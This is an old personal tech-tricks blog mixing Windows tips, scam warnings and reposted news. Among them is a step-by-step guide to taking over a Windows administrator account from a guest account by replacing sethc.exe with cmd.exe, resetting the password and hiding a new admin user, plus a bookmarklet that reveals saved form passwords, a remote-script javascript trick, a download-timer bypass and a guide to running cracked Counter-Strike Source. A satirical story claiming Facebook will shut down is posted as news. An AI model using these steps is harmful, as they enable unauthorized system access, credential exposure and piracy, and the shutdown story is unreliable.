Friday, November 25, 2011

~~1 Million Serial Numbers of Different Softwares ~~NaReNdRa~~

CLICK THIS TO GET YOUR GIFT !!!!!

LIKE OUR FACEBOOK PAGE PLEASE !!!!!!!!!!!

Password :-
tricksforfun@narendra

*This password is used intentionally !!




Sunday, October 9, 2011

Facebook API abuse can expose private user data, say hackers !!!!

IDG News Service - Facebook is ignoring a serious shortcoming in the way it limits application developers' access to information about Facebook users, according to a pair of hackers.

The problem is in the way Facebook's APIs (application programming interfaces) work, and could even lead to unauthorized password changes, according to hatter and ErrProne, two members of hacking think-tank Blackhat Academy.

Facebook applications use a special query language called FQL (Facebook Query Language) to extract and modify user information stored in the social network's database. This proprietary language is well documented and the information is public, allowing anyone to learn it.

Querying sensitive user information such as email addresses through FQL requires an API key, a unique identifier Facebook attributes to each app, but a lot of other private information can be extracted from the database without any such restrictions. The two hackers even provided working proof-of-concept code in their advisory.

According to hatter, API keys have too much power from the moment they are issued, and obtaining one is simple. A malicious programmer could obtain and abuse an API key while the associated app was still in development. Applications have access to more data while in that phase, before they are released; after Facebook reviews an app, it will restrict its rights to allow access only to the data the app needs to function.

However, attackers don't even need their own API key to extract data. They can piggyback on the key of a legitimate app by installing it on their profile and feeding it information requests with altered user ids. Depending on the application's permissions, this technique can be used to gather information from other users with the app installed, even if those users only shared the information with their friends.

This sort of abuse would likely be detected quickly by Facebook's security team, but attackers would still have enough time to grab the information they want before being blocked.

Blackhat Academy notified Facebook of this issue over two months ago, according to Hatter, and the group decided to publish the details only because the social networking giant doesn't share its concerns.

A Facebook spokesman dismissed the claims, saying: "What this person calls an 'FQL Injection' is simply our Facebook Platform APIs working as intended."

"We have a dedicated team that does a robust review of the applications accessing our APIs. This team uses a risk-based approach, looking at applications' velocity as defined by number of users or pieces of data shared," said the spokesman. "When a potentially bad application is reported to us or detected by our systems, we act swiftly to remove or sanction it before it gains access to data."

The hackers disagree, saying that Facebook probably didn't understand the full scope of the attack. "FQL injection is present in applications -- or you can just query the API directly," said Hatter.

The hacker is not convinced of the efficiency of Facebook's defenses either. "Analyzing applications based on velocity is awesome against worms and malware that spread rapidly. However, if a single user is the desired target, it does not help so much. An attacker could easily trick the target into running a single malicious app," he said.

Facebook's application platform has long been a source of privacy and security risks. Earlier this year, it was discovered that many apps, even top ones, were sharing and in some cases selling user ids to advertisers. This allowed them to build profiles used for behavioral advertising.

Earlier this week Trend Micro reported an incident where attackers managed to serve drive-by download exploits through malicious ads displayed in a legitimate app. These are clear indications that Facebook can't guarantee a good behavior from every app on its network and the overexposed APIs are just one more thing ill-intentioned individuals can exploit.

Thursday, October 6, 2011

Apple has lost a visionary and creative genius !!!!!! :(

The co-founder of Apple was 56 years old. Jobs had been battling a rare form of pancreatic cancer for years.
MAKING OF APPLE COMPUTERS : TIMELINE
===========================

1976: In April 1976, 26-year old Steve Wozniak and 21 year-old Steve Jobs, both college dropouts found Apple Computer, Inc. Both partners had sold their most valuable possessions, a van and two calculators to raise USD 1,300 to start the company.

1980: Apple renewed itself into public ownership in December 1980. Its offering of 4.6 million shares at USD 22 each sold out in minutes. 1981’s second offering of 2.6 million shares too sold out almost immediately.

1982: By January 1982, Apple had sold 6,50,000 computers worldwide. And, in December 1982, it became the first personal computer company to reach the USD 1 billion mark in annual sales.

1984: Debut of the Macintosh — Apple sold 70,000 Macintosh computers in the first 100 days. However, Macintosh sales temporarily fell-off after a promising start, and the company was disturbed by internal problems.

1985: Internal strife continued, John Sculley assumed the helm post the departure of Jobs and other Apple executives. They founded a new computer company, NeXT Incorporated as a rival to Apple.

1991: 1990s saw the crippling an industry giant at the back of mismanagement. However, the PowerBook series released in 1991 garnered a 21% market share in less than six months —Apple was all set to ride the digital wave of the next century.

1996: Return of Jobs — In December 1996, Apple paid USD 377 million to buy NeXT, led by Steve Jobs. Jobs, Apple's visionary was back as a special advisor, 12-years after he had left.

1997: Steve Jobs was named interim chief executive officer and Apple now focused exclusively on desktop and portable Macintoshes. Jobs shut plants, laid off thousands of workers, and sold stock to rival Microsoft for receiving cash infusion of USD 150 million in exchange.

1998: Though Apple's organizational hierarchy underwent sweeping reorganization in 1997, the most visible indication of Jobs's return was unveiled in August 1998. The all-in-one massively successful iMac was released.

2000: Jobs well done — With Jobs’s restorative efforts, Apple was again a profitable company. The company gained 94% in net income, profits swelled to USD 601 million and stock climbed 140% in 1999. And, Jobs's returned to Apple on a permanent basis.


2008: Apple’s shares began a dramatic climb with soaring sales and earnings. From USD 119 in late-February 2008, the stocks were nearly USD 190 in May 2008 and then crashed with the market meltdown later that year.

2011: Reinforcing the rise since the start of 2009, Apple has been witnessing explosive growth in sales and profit from iPhones, iPods, iPads and Macs.

August 25, 2011: Apple shares tumbled as much as 7% today, as a knee-jerk reaction to Jobs’s resignation. The world's most valuable technology firm now has all eyes and every weight on the shoulders of Tim Cook, who earlier had stepped in as interim CEO numerous times.

Wednesday, August 24, 2011

'Numerous Spams Activities from a Foreign IP' Webmail Phishing Scam !!

Outline
Email claims that the recipient's email account has been reported for sending spam and that he or she must follow a link and confirm account ownership or the account will be suspended.

Brief Analysis
The message is a phishing scam designed to trick recipients into divulging their email account login details to cybercriminals. If you receive such an email, do not follow any links or open any attachments that it may contain. Do not reply to the message or provide any information to the senders.

Detailed analysis and references below example.


Example

From: Webmail Report Subject: Important Notice (Do Not Ignore)

Your email account has been reported for numerous spams Activities from a foreign ip recently. As a result, Webmail has received advice to suspend your account.

However, you might not be the one promoting this Spam,as your email account might have been compromised.
To protect your account from sending spam mails, You are to confirm your true ownership of this account by Click here to Login and confirm in one simple step.

On receipt of the requested information,the Webmail support shall block your account from Spam.

Failure to do this will violate the Webmail email terms & conditions. This will render your account inactive.
NOTE: You will be send a password reset message In next seven (7) working days after undergoing this process for Security reasons.

Copyright 2011 - Webmail - All Rights Reserved.



Detailed Analysis
According to this message, the recipient's email account has been reported for "numerous spams activities" originating from a foreign IP and "Webmail" has therefore been advised to suspend the account. Supposedly in order to avoid this threatened suspension, the recipient is instructed to click a link in the message and supply information to confirm true ownership of the account. The recipient is warned that failing to supply the requested information will result in the account being rendered inactive.

However, the message is certainly not from "Webmail" or any other online email provider. In fact, the message represents an attempt by cybercriminals to steal email login credentials from recipients. Those who follow the link as instructed will be taken to a bogus website where they will be asked to provide their email address and password. The details supplied will be collected by criminals and used to hijack the victims' real web based email accounts and subsequently use them to send spam or perpetrate further scams such as the Friend Stranded in Foreign Country Scam.

Such emails are a common ruse that has been used in various incarnations by online criminals for several years. Some versions, including this one, purport to be from a generic "Webmail" provider, presumably in an attempt to pull in victims who use a range of different online email providers. Other versions specifically target users of common email service providers including, Hotmail, Gmail, Yahoo and Bigpond. Many variants of the scam ask the victim to simply reply to the email with his or her username and password rather than follow a link and provide the details on a bogus webform.

Be wary of any email that asks you to provide your email login credentials. Your email service provider already has this information and is never likely to ask you to supply it via an unsolicited email. If you receive one of these emails, do not click any links in the message. Do not open any attachments that may come with the message and do not reply.


Thursday, August 18, 2011

A notepad trick for MOTHER INDIA ;) :)

6966669999996669999996666669666669666666969966666966669666666 6966699999999699999999666696966669966666969696666966696966666 6966669999999999999996666966696669696666969669666966966696666 6966666699999999999966669666669669669666969666966966966669666 6966666666999999996666669999999669666966969666696969999999666 6966666666669999666666669666669669666696969666669969666669666 6966666666666996666666669666669669666669969666666969666669666

JUST COPY THE ABOVE CONTENT AND PASTE IN NOTEPAD
THEN CLICK "CTRL+H" AND THEN WRITE 6 IN FIND WHAT BOX
AND _ IN REPLACE WHAT BOX AND THEN CLICK REPLACE ALL THAT'S ALL !!!! :D

Sunday, June 5, 2011

4Shared time hack ;) !!!!!!!!!!!!!

Here is a tip that still working till now on How to hack 4Shared.com Free Download Waiting Time?. I’ll show you

1. First you will see an annoying waiting screen .......

2. type this on the address bar when the countdown starts,

javascript: alert(document.getElementById("divDLWait").style.display = 'none');alert(document.getElementById("divDLStart").style.display = 'block');

4Shared Free Download Time use client side scripting, so it’s just easy for us to hack.

3. Done ;)

Tuesday, April 19, 2011

Operate PC without using mouse !!!!

Here is a simple trick to operate COMPUTER without MOUSE

PRESS :-
               SHIFT+ALT+NumLock
          
Now you can use your number keys to act as mouse
 
Note :- It will not disable your mouse

HOW TO DISABLE AUTO PLAY OF YOUR PENDRIVE TO AVOID VIRUS ACTIVATION?

just follow the simple steps :-
=>Start

=>run
=>type   
    gpedit.ms
=>then click COMPUTER CONFIGRATION
=>open ADINISTRATIVE TEMPLATE,
=>open SYSTEM,
=>now you will see a option named "TURN OFF AUTO PLAY" in the sixth position from bottom,
=>right click this option,choose properties and DISABLE it !!!!!

Setting up a new broadband connection in windows xp


1. Click Start, click Control Panel, and then double-click Network and Internet
Connections.
2. Click
Network Connections, and then click Create a new connection in the Network
Tasks pane.
3. After the Network Connection Wizard starts, click
Next.
4. Click
Connect to the Internet, and then click Next.
5. Click
Set up my connection manually, and then click Next.
6. Click either
Connect using a broadband connection that requires a user name and
password or
Connect using a broadband connection that is always on.
7. Type the
Internet service provider (ISP) name that your ISP provided, and then
click
Next.
8. Type the user name that the ISP provided.
9. Type the password that the ISP provided.
10.Type the password one more time to confirm it, and then click Next.
11.Click
Add a shortcut to this connection to my desktop.
12.Click
Finish to complete the wizard.

Saturday, April 16, 2011

Notepad trick by Narendra kamath ;)

 Something different style....pls be guided accordingly
 Please ensure that the word wrap is not ticked under format option
Copy this onto notepad, press cntrl + H, press 6 in find box and underscore( _ ) in replace box and click replace all button. 



6996666699666666 669666666666999999996669999 99996 99666669966699999999666669999999966666666966 6666666
69996666996666666 99966666666999999996669999 9999 699966669966699999999666669999999966666669996 6666666
69999666996666669 9699666666699666699666996666666699996669966699666699666669966669966666699699666 6666
69969966996666699 66699666666999999996669999 9999 699699669966699666699666669999999966666996669 9666666
69966996996666999 99999966666999999996669999 9999 699669969966699666699666669999999966669999999 9966666
69966699996669999 99999996666996996666669966 6666 699666999966699666699666669969966666699999999 9996666
69966669996699666 66666699666996699666669999 9999 699666699966699999999666669966996666996666666 6699666
69966666996996666 66666669966996666996669999 9999 6996666699666999 9999966669966669969966666666 66699666

Sunday, April 10, 2011

Hacking administrator account in Windows!!!!

Note :- This is only for educational purpose..... Don't misuse this.
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…


Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Here is how to do that -

* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe

* Now Log out from your guest account and at the user select window,press shift key 5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER john/ADD” where “john” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)

Keep Folders Hidden

First create a new folder somewhere on your hard drive
when you name it hold down "Alt" and press "0160" this will create and invisible space so it will apper as if it has no name.
then right click in and select "Properties" select the tab "coustimize" and select "change icon" scroll along and you should a few blanc spaces click on any one and click ok when you hav saved the settings the folder will be invisible to hide all your personal files

How to safeguard your files when computer crashes

First thing to keep in mind: If your computer hasn't crashed yet, it will in the future! So instead of waiting for fate to strike, take some precautions now:

1) BACK-UP! Buy some decent DVD-R discs and put everything useful in them. When you have more useful stuff, backup again. Do this often.

2) Keep your computer healthy. Use an antivirus, an anti-spy, and a firewall. Keep them updated. Check regularly for Windows critical fixes.

3) Don't install software that would do dangerous things to your hard drive. A boot manager would fall in this category.

4) Use a registry cleaner before and after you install or uninstall any software. Many of the problems that will keep Windows from booting are caused by sloppy software that mess up your registry. A good registry cleaner is Tune-up Utilities.
Code:
http://www.tune-up.com/


5) Run chkdsk now and then. Go to Start> Run. Type chkdsk /F. Press enter.


In case your PC has already crashed, read the following:

Most important: Don't panic! Panic is like a little demon that whispers in your ear to format your hard drive and reinstall everything. Don't do it! You will lose all your data and the little demon will laugh at you.

To be exact you can still recover your data if you format your drive (by using special software), but only if you don't write anything on the disc afterwards. In other words format + windows install = bad idea. If you reinstall windows without formating your drive, you will only lose the files on your desktop and "My Documents" folder.

In all occasions you should make sure to safeguard your files before attempting any kind of repair!

So let's go about how to do that:

The fast way: Go to this site:
Code:
http://www.knoppix.org
. Knoppix is a Linux distribution than runs from a CD. Download the Knoppix ISO and burn it. Put it in your CD drive. On startup access BIOS and change the boot sequence so that your computer boots from the CD drive. Save settings and exit. Upon reboot, Knoppix will load.

Knoppix is much like windows and it comes with its own CD burner. Locate it, launch it and backup everything you want on CD. Now you don't have to worry anymore!


The less fast way: This requires that you have access to a second PC. Open the case of your computer and remove the hard disk.

Install it as a slave on the second PC.

Depending on respective configurations, you may have to change some jumper settings on the drive. Read the manual for help with installing hard drives and setting jumpers.

After this is done, boot the second PC. If everything went out ok, you should be able to access your drive without problems. (Edit: Note that Win98 cannot recognize a local NTFS (Win2K/XP) disk.)

Copy everything you need from your own hard drive to the other one. Now you don't have to worry anymore!

Replace your computer's hard disk, fix all problems and reverse the process to copy the data back to your computer, or take CD backups on the other PC.

How to Back Up the Registry

Before you edit the registry, export the keys in the registry that you plan to edit, or back up the whole registry. If a problem occurs, you can then follow the steps how-to restore the registry to its previous state.


How to Export Registry Keys

Click Start, and then click Run.

In the Open box, type regedit, and then click OK.

On the File menu, click Export.

In the Save in box, select the boxs at the bottom the bottom according to weather you want to export all or only selected branches of the registry.

Next select a location in which to save the backup .reg file. In the File name box, type a file name, and then click Save.


How to Restore the Registry

To restore registry keys that you exported, double-click the .reg file that you saved.

How To Add A Url Address Bar To The Taskbar

You can add an Internet URL address bar to your Windows XP taskbar. Doing so will let you type in URLs and launch Web pages without first launching a browser. It will also let you launch some native Windows XP applications in much the same way as you would via the Run menu (so you could type in calc to launch the calculator or mspaint to launch Microsoft Paint. Here's how you add the address bar:

1. Right-click on the taskbar, select Toolbars, and then click Address.

2. The word Address will appear on your taskbar.

3. Double click it to access it.

4. If that doesn't work, your taskbar is locked. You can unlock it by right-clicking on the taskbar again and uncheck Lock the Taskbar.

NOTE: You may also need to grab the vertical dotted lines beside the word Address and drag it to the left to make the Address window appear.

Burn a *.BIN file without a CUE using NERO


You've downloaded a *.BIN file, but there was no *.CUE file associated and you still want to burn the *.BIN file using Nero

Your options are:

1) Create yourself a *.CUE

2) Convert the *.BIN to an *.ISO

3) OR use Nero to burn without the *.CUE file!!!

Yes, that's possible... just follow these steps and you will be sorted. No need for *.CUE files anymore

Ok, here we go...

1) Start Nero

2) File -> Burn Image

3) Browse to the *.BIN file that you want to burn and open it

4) A window saying "Foreign Image Settings" will open

5) Check the settings. They should be as followed:

* Type of image: leave it to Data Mode 1
* Select the Raw Data check box
Note ->> The block size will change automatically from 2048 to 2352
* Leave Image Header and Image Trailer unchanged and set to 0
* Leave "Scrambled" and "Swapped" check boxes unchecked

6) Click on burn!

7) Enjoy

This tut was for Nero 5.x.x.x, I was told that "Burn Image" is under "recorder" in Nero 6. The rest of the steps should be the same...

Getting Counter-Strike Source to work


Step 1- Download cssource_notcracked_beta_emporio.rar, cssource_cracked_emporio.rar and cssource_updates_emporio.rar (make sure this update is V2).

Step 2- Extract cssource_notcracked_beta_emporio.rar to a folder (for this example we will use E:/CS: Source*), then extract cssource_cracked_emporio.rar to E:/CS: Source*(overwrite all files) and finally extract cssource_updates_emporio.rar(V2) to E:/CS: Source* (overwrite all files).

Step 3- Make a NEW steam account(We will use Bob1g2** for this example).

Step 4- Now here comes the tricky part. After you have made a NEW steam account, get any counter strike: condition zero key (and no i won't tell you one) off the internet. Launch steam and click on Condition Zero in the Avaible Games list. Click on Register this product and click next. Once you get to the point where it says, "Steam is processing you request" open up Task Manager (Ctrl, Alt, Delete at the same time) and click on steam.exe and once the steam window has 1 bar that is yellow, click terinate process on the task manager.

Step 5- Open up steam again and check if Condition Zero is in your My Games list. If it isn't then repeat Step 3 using a different key untill you get Condition Zero is your My Games list. Once you get it in your My Games list then, download Codename Gordon and once it has finished downloading, launch it. Once you get into the menu, then click exit.

Step 6- Go into the folder where you installed steam and copy ClientRegistry.blob into the folder where you installed CS: Source.

Step 7- Go into the folder where you installed CS: Source and open up SteamApp.cfg.

Step 8- Once you have opened up SteamApp.cfg, edit it so it only has this in it:

CODE

SteamAppId=10
#SteamAppVersionId=0
SteamInstallPath="E:/CS: Source*"
# [as is clearified later on, this should be your email address:]
#SteamAppUser=aalb002@cafe.boomtown.net
SteamAppUser=Bob1g2**


Make sure you change the Bob1g2** bit to the new steam account you created and the E:/CS: Source* to where you installed counter-strike source.

Step 9- Make a sortcut of hl2.exe with these in the sortcut(without the quotes) "-steam -game cstrike"

*Change this to where you installed CS: Source.
**Change this to your new steam account.

Downloads

cssource_notcracked_beta_emporio.rar- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/cssource_notcracked_beta_emporio.rar

cssource_cracked_emporio.rar- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/V2/cssource_cracked_emporio.rar

cssource_updates_emporio.rar(v2)- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/V2/cssource_updates_emporio.rar

Limit is 100 users max

Other things you should know

Don't download the V3 update since that doesn't work yet.

If you get a error saying that you are not subscribed, then do steps 4-6 to make it work again.

If you get unable to set mode then do this:
go to your registry -> HKEY_CURRENT_USER\Software\Valve\Source\Settings -> look up the entry "ScreenRefreshRate" -> doubleclick -> type your favourite monitor hz value into the field (i.e. 100hz, if your monitor can handle it) -> change the base setting from hexadecimal to decimal -> finished. (excerpt taken from flinkerhamster tutorial)

Some Servers

1. 66.199.235.42:27014

2. 24.141.2.86

These servers have being tested by me and are working.

Saturday, April 9, 2011

COMMON FTP ERROR CODES

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").

120 Service ready in nnn minutes.

125 Data connection already open; transfer starting.

150 File status okay; about to open data connection.

200 Command okay.

202 Command not implemented, superfluous at this site.

211 System status, or system help reply.

212 Directory status.

213 File status.

214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.

215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.

220 Service ready for new user.

221 Service closing control connection.

225 Data connection open; no transfer in progress.

226 Closing data connection. Requested file action successful (for example, file transfer or file abort).

227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).

230 User logged in, proceed. Logged out if appropriate.

250 Requested file action okay, completed.

257 "PATHNAME" created.

331 User name okay, need password.

332 Need account for login.

350 Requested file action pending further information

421 Service not available, closing control connection.This may be a reply to any command if the service knows it must shut down.

425 Can't open data connection.

426 Connection closed; transfer aborted.

450 Requested file action not taken.

451 Requested action aborted. Local error in processing.

452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy).

500 Syntax error, command unrecognized. This may include errors such as command line too long.

501 Syntax error in parameters or arguments.

502 Command not implemented.

503 Bad sequence of commands.

504 Command not implemented for that parameter.

530 Not logged in.

532 Need account for storing files.

550 Requested action not taken. File unavailable (e.g., file not found, no access).

551 Requested action aborted. Page type unknown.

552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).

553 Requested action not taken. File name not allowed.

Wednesday, April 6, 2011

Beware!!! My Facebook wall has been viewed X times - viral survey scam spreads rapidly

Do you want to know the total number of times that your Facebook wall has been viewed? Are you curious as to who may be stalking you on Facebook?

If so, you're a prime candidate for scammers who are exploiting that desire to put money into their own pockets.

Here are the latest messages spreading virally between thousands of Facebook users who have fallen for the scam:


 Different incarnations of the scam use slightly different wording, and dream up different numbers for the boys and girls who are said to have looked at your Facebook wall:

    SHOCKING! My Facebook wall has been seen 1981 times.
    Boy views: 1169.
    Girl views: 812.
    Check yours @: [LINK]

    WOW! My Facebook wall has been seen 2306 times.
    Boy views: 1568.
    Girl views: 738.
    Check yours @: [LINK]

    SHOCKING! My Facebook wall has been viewed 1326 times.
    Boy views: 610.
    Girl views: 716.
    Check yours @: http://bit.ly/eoCq9U

    AMAZING! My Facebook wall has been viewed 2410 times.
    Boy views: 819.
    Girl views: 1591.
    Check yours @: [LINK]

When you see one of your Facebook friends post a message like the above, chances are that you might be tempted to try it out for yourself. So what does happen if you click on one of those links?

Well, the first thing you see is a standard Facebook application request dialog - requesting your permission to grant a third-party app access to your Facebook profile. If you give it permission, then it will be able to peruse your Facebook page and post messages in your name.
The scammers have created a variety of different rogue applications that they are using in this particular scam. Facebook, sadly, doesn't adequately verify the people who create apps so you're playing Russian Roulette when you allow a complete stranger this level of access to your Facebook page.

Of course, you want to know how many boys or girls are checking out your Facebook - so you're likely just to grant the rogue application permission to your Facebook page.

Big mistake. You should have clicked on "Don't allow" instead.

The next thing you know, you are taken to a page which looks like it has lots of information about who has been viewing your Facebook wall.

But do you notice that all the information about who has been stalking you on Facebook is "locked" away? The page is asking you to complete a "30 second" security check to "prove you are human" in the form of an online survey. The implication is that you'll find out who has been viewing your Facebook profile, once you have completed the online test.

What the scammers don't tell you is that they earn commission for each survey completed. Furthermore, they have already exploited your own Facebook page to post out a message to your friends, inviting them to also find out how many times their Facebook wall has been viewed. In this way the revenue-generating survey scam spreads virally.

And do you ever discover who has been viewing your Facebook wall? I'm afraid not. But you have made some money for the scammers, and helped them with their nefarious scheme.

If you've been affected by this scam, you should clean up your account before any further damage is done.




Sunday, April 3, 2011

Epic Browser – A New Browser from India

If you are using Internet Explorer or Firefox or Chrome or Opera or Safari for browsing give it a Desi change with Epic – A New Browser from India. The Epic browser is developed by Bangalore based Hidden Reflex and is based on Mozilla and is available for free. What is very important is the news of Epic could give Moksha or liberation to millions of Indian netizens who are stuck with Internet Explorer 6.

So what is the difference from other existing browsers or why should I try out Epic –

    * The makers claim it is the world’s only antivirus browser.
    * Plus the browser has an inbuilt addon to detect websites that are dangerous.
    * If you are an Indian then it is the first ever web browser from India.
    * Anti-phishing protection - a big bold domain name on the address bar.

Apart from this, other features include those that is available in other browsers using addons

    * You can type in 12 different Indian languages including Hindi, Gujarati, Marathi, Kannada,Telugu,Bengali, Tamil, Malayalam, Urdu and Punjabi.
    * In the browser’s sidebar you can edit text, read news, view videos and pictures.
    * Also claims of faster browsing and faster downloads.


Download - Epic browser here at the official website. 

Moksha from Internet Explorer 6 :-

It would be wonderful if the Epic Browser could liberate majority of home users in India who are stuck with Internet Explorer 6. There is a campaign going around the world to kill Internet Explorer 6 but majority of Indians are unaware of it. At least a desi browser (through nationalistic or patriotic feeling) should give many an encouragement to come out of IE 6.

Perhaps this news might prompt them to explore other browsers or at least they will come to know that there is a world outside Internet Explorer 6.

Even today more than 50% of the people that visits our website from India use Internet Explorer 6 browser, which does not support many of the modern browsing facilities. The net result is that quite often we are forced to not to use many new features, that would enrich our website, as it is not supported by IE 6.


Can't boot into Windows? [Solution]


Scenario :-

You tried a Linux distribution but you didn't like it enough to keep it.

Dilemma :-

You delete the Linux partition and attempt to boot into Windows, only to find that you can't because "grub" cannot be found, or there is no grub partition.

Solution :-

1. Get your Windows DVD.
2. Boot from it.
3. Select "Repair" or "System Recovery".
4. Select "Command Prompt".
5. Type

Code:
BootRec.exe /fixmbr

OR

Code:
fixmbr
6. Press <Enter>
7. Type

Code:
BootRec.exe /fixboot

OR

Code:
fixboot
8. Press <Enter>
9. Restart your computer.

Note: The above codes are for XP and Vista/Win 7, respectfully.

Conclusion :-

You should now be able to boot into Windows :D

How to change mac address in Linux ? [Tutorial]


First of all you have to open Terminal

Type the following command to check the mac:
1. ifconfig -a | grep HWaddr
(Note it down somewhere )

2. ifconfig eth0 down

ifconfig eth0 hw ether 00:70:5D:34:54:02
(Any mac address you want to give)

ifconfig eth0 up

ifconfig -a | grep HWaddr
(To check your new mac address)


Note:

1. mac address should be in hex dec.

2. you can change mac add. of any interface
but you have to specify name

Saturday, April 2, 2011

How to reveal the password behind the asterisk.......? [ Solution ]

 To view passwords behind asterisk characters, copy and paste the code below into your clear address bar of the page where you have entered the password and press enter.

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if%20(s)%20alert(%22Passwords%20in%20forms%20on%20this%20pag​e:\n\n%22%20+%20s);%20else%20alert(%22There%20are%20no%20passwords%20in%20forms%2​0on%20this%20page.%22);})();

Friday, March 25, 2011

SPEED UP ACROBAT READER [ALMOST LIKE NOTEPAD] !!


Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.

 1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad.

Wednesday, March 23, 2011

Some of the amazing javascript tricks !!!!

* JavaSript to Edit any Webpage!
javascript:document.body.contentEditable='true'; document.designMode='on'; void (0);

* Webpage Content Killer -Destroy any Webpage.
javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://img.hacker9.com/hacker9/asteroids.min.js';void(0);

* The Javascript Calculator....
javascript: alert(34343+3434-222);

* Floating or Dancing Images in Webpage
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

* Shake your Browser Window!
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0);} } }} Shw(6)

* Reveal Password Behind Asterisk(*****) Using Javascript
javascript: alert(document.getElementById('Passwd').value);

Note for beginners only :- To see the effect of these javascripts you should copy only the codes in green colour and paste in the clear address bar of your browser[ where you write www.tricksforfun.blogspot.com and all ] and press enter !!!!!! Enjoy....!

Monday, March 21, 2011

FACEBOOK WILL END ON MARCH 15th, 2012!

  Source :- http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/
PALO ALTO, CA –Mark Zuckerberg announced that Facebook will be shut down in March of 2012. Managing the site has become too stressful.
“Facebook has gotten out of control,” said Zuckerberg in a press conference outside his Palo Alto office, “and the stress of managing this company has ruined my life. I need to put an end to all the madness.”
Zuckerberg went on to explain that starting March 15th of next year, users will no longer be able to access their Facebook accounts.  That gives users (and Facebook addicts) a year to adjust to life without Facebook.
“After March 15th, 2012 the whole website shuts down,” said Avrat Humarthi, Vice President of Technical Affairs at Facebook. “So if you ever want to see your pictures again, I recommend you take them off the internet. You won’t be able to get them back after Facebook goes out of business.”
Zuckerberg said the decision to shut down Facebook was difficult, but that he does not think people will be upset.
“I personally don’t think it’s a big deal,” he said in a private phone interview. “And to be honest, I think it’s for the better. Without Facebook, people will have to go outside and make real friends. That’s always a good thing.”
Some Facebook users were furious upon hearing the shocking news.
“What am I going to do without Facebook?” said Denise Bradshaw, a high school student from Indiana. “My life revolves around it. I’m on Facebook at least 10 hours a day. Now what am I going to do with all that free time?”
However, parents across the country have been experiencing a long anticipated sense of relief.
“I’m glad the Facebook nightmare is over,” said Jon Guttari, a single parent from Detroit. “Now my teenager’s face won’t be glued to a computer screen all day. Maybe I can even have a conversation with her.”
Those in the financial industry are criticizing Zuckerberg for walking away from a multibillion dollar franchise. Facebook is currently ranked as one of the wealthiest businesses in the world, with economists estimating its value at around 7.9 billion.
But Zuckerberg remains unruffled by these accusations. He said he will stand by his decision to give Facebook the axe.
“I don’t care about the money,” said Zuckerberg. “I just want my old life back.”
The Facebook Corporation suggests that users remove all of their personal information from the website before March 15th, 2012. After that date, all photos, notes, links, and videos will be permanently erased.

Sunday, March 20, 2011

I accidentally deleted my "mspaint.exe"/"notepad.exe"/etc. file, how can I get it back?

Solutions:-

You can use any of following methods:

A. Goto "%windir%\System32\DLLCache" folder and look for the file, if its there then copy it to "%windir%\System32\" folder.

B. Insert your Windows Setup CD and goto "I386" folder. Now look for the same file, it'll present there but the last letter of extension will be "_". e.g., u'll get "mspaint.ex_"/"notepad.ex_"/etc. Now open Command Prompt and goto "I386" folder and give following command:

expand mspaint.ex_ mspaint.exe
expand notepad.ex_ notepad.exe
